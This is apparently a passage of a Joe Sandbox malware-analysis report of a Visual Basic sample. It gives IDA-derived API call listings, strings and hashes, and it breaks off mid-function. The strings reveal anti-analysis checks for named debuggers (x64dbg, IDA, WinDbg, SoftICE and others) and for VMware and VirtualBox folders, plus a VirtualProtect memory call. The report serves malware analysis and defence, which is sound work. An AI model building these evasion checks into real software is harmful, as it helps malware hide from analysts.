__vbaStrCat.MSVBVM60(0FA35EBC,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49CE7
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49CEE
__vbaStrCat.MSVBVM60(0FA35EC4,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49CF6
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49CFD
__vbaStrCat.MSVBVM60(0FA35ECC,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49D05
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49D0C
#644.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49D0F
#644.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49D16
__vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA49D25
__vbaFreeStrList.MSVBVM60(00000006,?,?,?,?,?,?), ref: 0FA49D45
#644.MSVBVM60(WinDbgFrameClass), ref: 0FA49D6B
#644.MSVBVM60(00000000), ref: 0FA49D72
__vbaSetSystemError.MSVBVM60(?,00000000), ref: 0FA49D81
#644.MSVBVM60(ObsidianGUI), ref: 0FA49DA4
#644.MSVBVM60(00000000), ref: 0FA49DAB
__vbaSetSystemError.MSVBVM60(?,00000000), ref: 0FA49DBA
__vbaStrCat.MSVBVM60(0FA35F20,0FA35F18), ref: 0FA49DE2
__vbaStrMove.MSVBVM60 ref: 0FA49DE9
__vbaStrCat.MSVBVM60(0FA35F20,00000000), ref: 0FA49DF1
__vbaStrMove.MSVBVM60 ref: 0FA49DF8
__vbaStrCat.MSVBVM60(0FA35F28,00000000), ref: 0FA49E00
__vbaStrMove.MSVBVM60 ref: 0FA49E07
__vbaStrCat.MSVBVM60(0FA35EBC,00000000), ref: 0FA49E0F
__vbaStrMove.MSVBVM60 ref: 0FA49E16
__vbaStrCat.MSVBVM60(0FA35EC4,00000000), ref: 0FA49E1E
__vbaStrMove.MSVBVM60 ref: 0FA49E25
__vbaStrCat.MSVBVM60(0FA35ECC,00000000), ref: 0FA49E2D
__vbaStrMove.MSVBVM60 ref: 0FA49E34
#644.MSVBVM60(00000000), ref: 0FA49E37
#644.MSVBVM60(00000000), ref: 0FA49E3E
__vbaSetSystemError.MSVBVM60(?,00000000), ref: 0FA49E4D
__vbaFreeStrList.MSVBVM60(00000006,?,?,?,?,?,?), ref: 0FA49E6D
#644.MSVBVM60(Soft Ice), ref: 0FA49E93
#644.MSVBVM60(00000000), ref: 0FA49E9A
__vbaSetSystemError.MSVBVM60(?,00000000), ref: 0FA49EA9
__vbaStrCat.MSVBVM60(0FA35F50,0FA35F48), ref: 0FA49ED1
__vbaStrMove.MSVBVM60 ref: 0FA49ED8
__vbaStrCat.MSVBVM60(0FA35F50,00000000), ref: 0FA49EE0
__vbaStrMove.MSVBVM60 ref: 0FA49EE7
__vbaStrCat.MSVBVM60(0FA35EBC,00000000), ref: 0FA49EEF
__vbaStrMove.MSVBVM60 ref: 0FA49EF6
__vbaStrCat.MSVBVM60(0FA35EC4,00000000), ref: 0FA49EFE
__vbaStrMove.MSVBVM60 ref: 0FA49F05
__vbaStrCat.MSVBVM60(0FA35ECC,00000000), ref: 0FA49F0D
__vbaStrMove.MSVBVM60 ref: 0FA49F14
#644.MSVBVM60(00000000), ref: 0FA49F17
#644.MSVBVM60(00000000), ref: 0FA49F1D
__vbaSetSystemError.MSVBVM60(00000000,00000000), ref: 0FA49F28
__vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 0FA49F44
#644.MSVBVM60(0FA35E28), ref: 0FA49F67
#644.MSVBVM60(00000000), ref: 0FA49F6D
__vbaSetSystemError.MSVBVM60(00000000,00000000), ref: 0FA49F7F
#644.MSVBVM60(Zeta Debugger), ref: 0FA49F9E
#644.MSVBVM60(00000000), ref: 0FA49FA5
__vbaSetSystemError.MSVBVM60(?,00000000), ref: 0FA49FB4
#713.MSVBVM60(reggubeD kcoR), ref: 0FA49FD3
__vbaStrMove.MSVBVM60 ref: 0FA49FDE
#644.MSVBVM60(00000000), ref: 0FA49FE1
#644.MSVBVM60(00000000), ref: 0FA49FE7
__vbaSetSystemError.MSVBVM60(00000000,00000000), ref: 0FA49FF2
__vbaFreeStr.MSVBVM60 ref: 0FA4A002

Strings

x32dbg, xrefs: 0FA49C3C
WinDbgFrameClass, xrefs: 0FA49D66
reggubeD kcoR, xrefs: 0FA49FCE
ObsidianGUI, xrefs: 0FA49D9F
Zeta Debugger, xrefs: 0FA49F99
x64dbg, xrefs: 0FA49BF1
IDA, xrefs: 0FA49C70
Soft Ice, xrefs: 0FA49E8E

Memory Dump Source

Source File: 00000005.00000002.978411638.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000005.00000002.978404014.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978611441.000000000FA88000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_fa30000_vbc.jbxd

Similarity

API ID: __vba$#644$Move$ErrorSystem$Free$List$#713
String ID: IDA$ObsidianGUI$Soft Ice$WinDbgFrameClass$Zeta Debugger$reggubeD kcoR$x32dbg$x64dbg
API String ID: 2197934108-1338123029
Opcode ID: 45e7551037c73fb1ac2498a493f08ad9909de1b61573c468ce027248a566e993
Instruction ID: a834c709c496c29a81fa535a2813a3303298c1f34ebd7c26ea07ed712ab5de1a
Opcode Fuzzy Hash: 45e7551037c73fb1ac2498a493f08ad9909de1b61573c468ce027248a566e993
Instruction Fuzzy Hash: CAD14FB1E0131AAEDB00EBB8DD859EFBAB9FF44650F14461AF411A7181DF789D01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0FA4D8A0 Relevance: 94.8, APIs: 46, Strings: 8, Instructions: 330COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(0FA3696C,0FA88818), ref: 0FA4D916
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0FA3695C,00000014), ref: 0FA4D93B
__vbaHresultCheckObj.MSVBVM60(00000000,?,0FA3697C,00000058), ref: 0FA4D95F
#689.MSVBVM60(?,Options,Show Tips at Startup), ref: 0FA4D993
__vbaStrMove.MSVBVM60 ref: 0FA4D9A4
__vbaI4Str.MSVBVM60(00000000), ref: 0FA4D9A7
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0FA4D9B9
__vbaFreeObj.MSVBVM60 ref: 0FA4D9C5
__vbaNew2.MSVBVM60(0FA3696C,0FA88818), ref: 0FA4D9E2
__vbaObjSetAddref.MSVBVM60(?,0FA31328), ref: 0FA4D9F5
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0FA3695C,00000010), ref: 0FA4DA13
__vbaObjSet.MSVBVM60(?,00000000), ref: 0FA4DA2C
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0FA369D0,000000E4), ref: 0FA4DA51
__vbaFreeObj.MSVBVM60 ref: 0FA4DA5A
#594.MSVBVM60(?), ref: 0FA4DA72
__vbaFreeVar.MSVBVM60 ref: 0FA4DA7B
__vbaNew2.MSVBVM60(0FA3696C,0FA88818), ref: 0FA4DA94
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0FA3695C,00000014), ref: 0FA4DAB9
__vbaHresultCheckObj.MSVBVM60(00000000,?,0FA3697C,00000050), ref: 0FA4DADD
__vbaStrCat.MSVBVM60(0FA35DB8,?), ref: 0FA4DAF2
__vbaStrMove.MSVBVM60 ref: 0FA4DAF9
__vbaStrCat.MSVBVM60(TIPOFDAY.TXT,00000000), ref: 0FA4DB01
__vbaStrMove.MSVBVM60 ref: 0FA4DB08
__vbaHresultCheckObj.MSVBVM60(00000000,0FA31328,0FA36850,000006F8), ref: 0FA4DB2B
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0FA4DB4D
__vbaFreeObj.MSVBVM60 ref: 0FA4DB59
__vbaObjSet.MSVBVM60(?,00000000), ref: 0FA4DB78
__vbaStrCat.MSVBVM60(TIPOFDAY.TXT,Die Datei ), ref: 0FA4DB8D
__vbaStrMove.MSVBVM60 ref: 0FA4DB94
__vbaStrCat.MSVBVM60( wurde nicht gefunden? ,00000000), ref: 0FA4DB9C
__vbaStrMove.MSVBVM60 ref: 0FA4DBA3
__vbaStrCat.MSVBVM60(0FA36A34,00000000), ref: 0FA4DBAB
__vbaStrMove.MSVBVM60 ref: 0FA4DBB2
__vbaStrCat.MSVBVM60(0FA36A34,00000000), ref: 0FA4DBBA
__vbaStrMove.MSVBVM60 ref: 0FA4DBC1
__vbaStrCat.MSVBVM60(Textdatei mit dem Namen ,00000000), ref: 0FA4DBC9
__vbaStrMove.MSVBVM60 ref: 0FA4DBD0
__vbaStrCat.MSVBVM60(TIPOFDAY.TXT,00000000), ref: 0FA4DBD8
__vbaStrMove.MSVBVM60 ref: 0FA4DBDF
__vbaStrCat.MSVBVM60( unter Verwendung von NotePad mit 1 Tip pro Zeile erstellen. ,00000000), ref: 0FA4DBE7
__vbaStrMove.MSVBVM60 ref: 0FA4DBEE
__vbaStrCat.MSVBVM60(Dann im selben Verzeichnis wie die Anwendung ablegen. ,00000000), ref: 0FA4DBF6
__vbaStrMove.MSVBVM60 ref: 0FA4DBFD
__vbaHresultCheckObj.MSVBVM60(00000000,?,0FA36B7C,00000054), ref: 0FA4DC16
__vbaFreeStrList.MSVBVM60(00000008,?,?,?,?,?,?,?,?), ref: 0FA4DC3E
__vbaFreeObj.MSVBVM60 ref: 0FA4DC4A

Strings

TIPOFDAY.TXT, xrefs: 0FA4DAFC, 0FA4DB85, 0FA4DBD3
Die Datei , xrefs: 0FA4DB80
unter Verwendung von NotePad mit 1 Tip pro Zeile erstellen. , xrefs: 0FA4DBE2
Show Tips at Startup, xrefs: 0FA4D974
Options, xrefs: 0FA4D979
wurde nicht gefunden? , xrefs: 0FA4DB97
Textdatei mit dem Namen , xrefs: 0FA4DBC4
Dann im selben Verzeichnis wie die Anwendung ablegen. , xrefs: 0FA4DBF1

Memory Dump Source

Source File: 00000005.00000002.978411638.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000005.00000002.978404014.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978611441.000000000FA88000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_fa30000_vbc.jbxd

Similarity

API ID: __vba$Move$CheckFreeHresult$ListNew2$#594#689Addref
String ID: unter Verwendung von NotePad mit 1 Tip pro Zeile erstellen. $ wurde nicht gefunden? $Dann im selben Verzeichnis wie die Anwendung ablegen. $Die Datei $Options$Show Tips at Startup$TIPOFDAY.TXT$Textdatei mit dem Namen
API String ID: 1089064309-1690764050
Opcode ID: a070e8efaddca6d1b781e58ee92a3867575a63f39b84d0cbebee74468d470776
Instruction ID: 27c3b4c739de19a257207ddbc9b2a2725ba6426a6556b6025e0b4a6f7a1c8900
Opcode Fuzzy Hash: a070e8efaddca6d1b781e58ee92a3867575a63f39b84d0cbebee74468d470776
Instruction Fuzzy Hash: DBC10C71E40209BFDB14DBA4DD49EEEBBB8FF88711B108119F505E7251DAB86906CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0FA4BAF0 Relevance: 54.4, APIs: 28, Strings: 3, Instructions: 184COMMON

Download Yara Rule

APIs

#526.MSVBVM60(?,00000104,72A1C0FD,72A46AEE,72A1C30A), ref: 0FA4BB48
__vbaStrVarMove.MSVBVM60(?), ref: 0FA4BB52
__vbaStrMove.MSVBVM60 ref: 0FA4BB5D
__vbaFreeVar.MSVBVM60 ref: 0FA4BB66
__vbaStrCopy.MSVBVM60 ref: 0FA4BB74
__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000002,00000000), ref: 0FA4BB8B

Part of subcall function 0FA4BF90: __vbaVarVargNofree.MSVBVM60(72A1A008,00000000,72A46AEE,?,?,?,?,?,00000000,0FA32FF6,0FA4D1CE), ref: 0FA4BFC7
Part of subcall function 0FA4BF90: __vbaStrVarVal.MSVBVM60(?,00000000,?,?,?,?,?,00000000,0FA32FF6,0FA4D1CE), ref: 0FA4BFD2
Part of subcall function 0FA4BF90: #644.MSVBVM60(00000000,?,?,?,?,?,00000000,0FA32FF6,0FA4D1CE), ref: 0FA4BFD9
Part of subcall function 0FA4BF90: __vbaFreeStr.MSVBVM60(?,?,?,?,?,00000000,0FA32FF6,0FA4D1CE), ref: 0FA4BFE5

__vbaVarMove.MSVBVM60(?), ref: 0FA4BBCE
__vbaVarMove.MSVBVM60(?), ref: 0FA4BC0C
__vbaVarMove.MSVBVM60 ref: 0FA4BC36
__vbaErase.MSVBVM60(00000000,?), ref: 0FA4BC5E
#616.MSVBVM60(?,00000000), ref: 0FA4BC6D
__vbaStrMove.MSVBVM60 ref: 0FA4BC78
__vbaStrCopy.MSVBVM60 ref: 0FA4BC88
__vbaStrCat.MSVBVM60(\VMWare\,?), ref: 0FA4BC9D
__vbaVarMove.MSVBVM60 ref: 0FA4BCB2
__vbaFreeVar.MSVBVM60 ref: 0FA4BCB7
__vbaStrCat.MSVBVM60(\oracle\virtualbox guest additions\,?), ref: 0FA4BCC6
__vbaStrMove.MSVBVM60 ref: 0FA4BCCD
__vbaStrCopy.MSVBVM60 ref: 0FA4BCDD
__vbaFreeStr.MSVBVM60 ref: 0FA4BCEC
__vbaStrVarVal.MSVBVM60(?,0FA88270), ref: 0FA4BCF9
#644.MSVBVM60(00000000), ref: 0FA4BD06
__vbaSetSystemError.MSVBVM60(00000000), ref: 0FA4BD10
#644.MSVBVM60(00000000), ref: 0FA4BD1F
__vbaSetSystemError.MSVBVM60(00000000), ref: 0FA4BD29
__vbaFreeStr.MSVBVM60 ref: 0FA4BD34
__vbaFreeStr.MSVBVM60(0FA4BD75), ref: 0FA4BD6D
__vbaFreeStr.MSVBVM60 ref: 0FA4BD72

Strings

\VMWare\, xrefs: 0FA4BC98
\oracle\virtualbox guest additions\, xrefs: 0FA4BCC1
PROGRAMFILES, xrefs: 0FA4BB6C

Memory Dump Source

Source File: 00000005.00000002.978411638.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000005.00000002.978404014.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978611441.000000000FA88000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_fa30000_vbc.jbxd

Similarity

API ID: __vba$Move$Free$#644Copy$ErrorSystem$#526#616EraseNofreeRedimVarg
String ID: PROGRAMFILES$\VMWare\$\oracle\virtualbox guest additions\
API String ID: 3986424551-1177384238
Opcode ID: f4b052820632aa1d4bd96bfdc1f9cd98b1f788d18d90b6c02d8a9c67b1f5c2b6
Instruction ID: 77b1424ef91862fc16732dc0e1ecc076d2961e42a195a31a8825f6a3266fb814
Opcode Fuzzy Hash: f4b052820632aa1d4bd96bfdc1f9cd98b1f788d18d90b6c02d8a9c67b1f5c2b6
Instruction Fuzzy Hash: 68713B75D002189FDB14DFA8D888AEEBBB5FF48311F10855AF406A7345DB78A946CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0FA4C960 Relevance: 31.7, APIs: 21, Instructions: 157COMMON

Download Yara Rule

APIs

__vbaVarDup.MSVBVM60(?,72A46AEE,72A2697D), ref: 0FA4C9D0
__vbaVarDup.MSVBVM60 ref: 0FA4C9EF
#607.MSVBVM60(?,00000104,?), ref: 0FA4CA01
__vbaVarMove.MSVBVM60 ref: 0FA4CA16
__vbaFreeVar.MSVBVM60 ref: 0FA4CA1B
__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000002,00000000), ref: 0FA4CA35

Part of subcall function 0FA4BF90: __vbaVarVargNofree.MSVBVM60(72A1A008,00000000,72A46AEE,?,?,?,?,?,00000000,0FA32FF6,0FA4D1CE), ref: 0FA4BFC7
Part of subcall function 0FA4BF90: __vbaStrVarVal.MSVBVM60(?,00000000,?,?,?,?,?,00000000,0FA32FF6,0FA4D1CE), ref: 0FA4BFD2
Part of subcall function 0FA4BF90: #644.MSVBVM60(00000000,?,?,?,?,?,00000000,0FA32FF6,0FA4D1CE), ref: 0FA4BFD9
Part of subcall function 0FA4BF90: __vbaFreeStr.MSVBVM60(?,?,?,?,?,00000000,0FA32FF6,0FA4D1CE), ref: 0FA4BFE5

__vbaVarMove.MSVBVM60(?), ref: 0FA4CA7B
__vbaVarMove.MSVBVM60(?), ref: 0FA4CAB8
__vbaVarMove.MSVBVM60 ref: 0FA4CAE8
__vbaErase.MSVBVM60(00000000,?), ref: 0FA4CB16
__vbaStrVarVal.MSVBVM60(?,?,00000000), ref: 0FA4CB29
#616.MSVBVM60(00000000), ref: 0FA4CB30
__vbaVarMove.MSVBVM60 ref: 0FA4CB46
__vbaFreeStr.MSVBVM60 ref: 0FA4CB4B
__vbaVarCopy.MSVBVM60 ref: 0FA4CB70
__vbaVarCopy.MSVBVM60 ref: 0FA4CB7C
__vbaFreeStr.MSVBVM60(0FA4CBF4), ref: 0FA4CBD0
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 0FA4CBD8
__vbaFreeVar.MSVBVM60 ref: 0FA4CBE7
__vbaFreeStr.MSVBVM60 ref: 0FA4CBEC
__vbaFreeVar.MSVBVM60 ref: 0FA4CBF1

Memory Dump Source

Source File: 00000005.00000002.978411638.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000005.00000002.978404014.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978611441.000000000FA88000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_fa30000_vbc.jbxd

Similarity

API ID: __vba$Free$Move$Copy$#607#616#644DestructEraseNofreeRedimVarg
String ID:
API String ID: 2836734116-0
Opcode ID: 5171fd9f3544fc56aa53b00d171a4d337240d818951531beffd72906046cfe26
Instruction ID: 18b88b49f998e7ff74c0390dc6998640d3efd962f69948d1a10e5efb97aeda22
Opcode Fuzzy Hash: 5171fd9f3544fc56aa53b00d171a4d337240d818951531beffd72906046cfe26
Instruction Fuzzy Hash: 3371E5B1D002289FDB24DFA8DC84BDDBBB8FF48314F008199E50AA7245DB746A49CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0FA86A30 Relevance: 30.1, APIs: 20, Instructions: 145memoryCOMMON

Download Yara Rule

APIs

__vbaRedim.MSVBVM60(00000080,00000001,0FA881D0,00000011,00000001,0000003F,00000000,72A1C0FD,72A46AEE,72A1C30A), ref: 0FA86A8C
__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000000,00000000), ref: 0FA86A9E
__vbaVarMove.MSVBVM60 ref: 0FA86AC0
__vbaErase.MSVBVM60(00000000,?), ref: 0FA86AEC
__vbaStrCat.MSVBVM60(0FA35C64,0FA35C5C,?), ref: 0FA86B09
__vbaStrMove.MSVBVM60 ref: 0FA86B16
__vbaStrCat.MSVBVM60(0FA35C84,00000000), ref: 0FA86B1E
__vbaStrMove.MSVBVM60 ref: 0FA86B25
__vbaStrCat.MSVBVM60(0FA35C8C,00000000), ref: 0FA86B2D
__vbaStrMove.MSVBVM60 ref: 0FA86B34
__vbaI4Str.MSVBVM60(00000000), ref: 0FA86B37
__vbaStrCat.MSVBVM60(0FA35C84,0FA35C7C,00000000), ref: 0FA86B48
__vbaStrMove.MSVBVM60 ref: 0FA86B4F
__vbaI4Str.MSVBVM60(00000000), ref: 0FA86B52
VirtualProtect.KERNEL32(00000000,00000000), ref: 0FA86B60
__vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 0FA86B74
__vbaAryLock.MSVBVM60(?,00000000), ref: 0FA86B88
#644.MSVBVM60(0FA32FF6), ref: 0FA86B9A
__vbaAryUnlock.MSVBVM60(?), ref: 0FA86BA6
VirtualProtect.KERNEL32(00000000,00000040,?,?,00000000,00000000,00000040), ref: 0FA86BC2

Memory Dump Source

Source File: 00000005.00000002.978411638.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000005.00000002.978404014.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978611441.000000000FA88000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_fa30000_vbc.jbxd

Similarity

API ID: __vba$Move$ProtectRedimVirtual$#644EraseFreeListLockUnlock
String ID:
API String ID: 1098726545-0
Opcode ID: b4551ae5524c82ee1350f99050057b547fcd346bc5e79e8dd4f491a750e0b7f8
Instruction ID: 9ad4fbb0cac03badacde59b916c6d781fcbf878115105be56cbfac081d3edea2
Opcode Fuzzy Hash: b4551ae5524c82ee1350f99050057b547fcd346bc5e79e8dd4f491a750e0b7f8
Instruction Fuzzy Hash: 09511371E10219AFDB14DFA4DC85EEFBB79FF48711F05411AF501A7241DAB45906CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0FA86830 Relevance: 24.1, APIs: 16, Instructions: 137COMMON

Download Yara Rule

APIs

__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000004,00000000,72A1C0FD,72A46AEE,72A1C30A), ref: 0FA8688A
__vbaVarMove.MSVBVM60 ref: 0FA868BA
__vbaStrCat.MSVBVM60(0FA35C64,0FA35C5C), ref: 0FA868CC
__vbaStrMove.MSVBVM60 ref: 0FA868D3
__vbaStrCat.MSVBVM60(0FA35C6C,00000000), ref: 0FA868DF
__vbaStrMove.MSVBVM60 ref: 0FA868E6
__vbaStrCat.MSVBVM60(0FA35C74,00000000), ref: 0FA868F2
#638.MSVBVM60(?), ref: 0FA86902
__vbaVarMove.MSVBVM60 ref: 0FA86933
#644.MSVBVM60(?), ref: 0FA86939
__vbaVarMove.MSVBVM60 ref: 0FA86959
__vbaVarMove.MSVBVM60 ref: 0FA86976
__vbaVarMove.MSVBVM60 ref: 0FA86996
__vbaErase.MSVBVM60(00000000,?), ref: 0FA869BC
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0FA869CC
__vbaFreeVar.MSVBVM60 ref: 0FA869D8

Memory Dump Source

Source File: 00000005.00000002.978411638.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000005.00000002.978404014.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978611441.000000000FA88000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_fa30000_vbc.jbxd

Similarity

API ID: __vba$Move$Free$#638#644EraseListRedim
String ID:
API String ID: 2306505667-0
Opcode ID: e55e0537d67e960690c0b8b819874f5010b7237760eb2e537e1c55c8f2c5a152
Instruction ID: 59206c39a73485f288966e594569326bd33064dea6e66f86acb3ec878382cc2d
Opcode Fuzzy Hash: e55e0537d67e960690c0b8b819874f5010b7237760eb2e537e1c55c8f2c5a152
Instruction Fuzzy Hash: F05107B1E10219AFDB04DFA8DC98AADBBB5FF48710F05821AE505A7241DBB4A905CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0FA4D3C0 Relevance: 22.6, APIs: 15, Instructions: 142COMMON

Download Yara Rule

APIs

#648.MSVBVM60(?), ref: 0FA4D421
__vbaFreeVar.MSVBVM60 ref: 0FA4D42D
__vbaStrCmp.MSVBVM60(0FA35FF8,00000000), ref: 0FA4D444
#645.MSVBVM60(?,00000000), ref: 0FA4D461
__vbaStrMove.MSVBVM60 ref: 0FA4D46C
__vbaStrCmp.MSVBVM60(0FA35FF8,00000000), ref: 0FA4D478
__vbaFreeStr.MSVBVM60 ref: 0FA4D486
__vbaFreeStr.MSVBVM60(0FA4D59B), ref: 0FA4D594

Memory Dump Source

Source File: 00000005.00000002.978411638.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000005.00000002.978404014.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978611441.000000000FA88000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_fa30000_vbc.jbxd

Similarity

API ID: __vba$Free$#645#648Move
String ID:
API String ID: 2957232524-0
Opcode ID: bd8f3eb20679f8dc7bab7424aae68bfec6b63cac4d33478385bbbcbec107c751
Instruction ID: 8a29a6c4036831750f30d82e72c3028f275a2c4c6039e2bdd02687a75272058c
Opcode Fuzzy Hash: bd8f3eb20679f8dc7bab7424aae68bfec6b63cac4d33478385bbbcbec107c751
Instruction Fuzzy Hash: 605129B1D00209AFCB00DFA9D984AEDBBB9FF49715F10411DF519A7241DB746A06CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0FA4D5D0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 116COMMON

Download Yara Rule

APIs

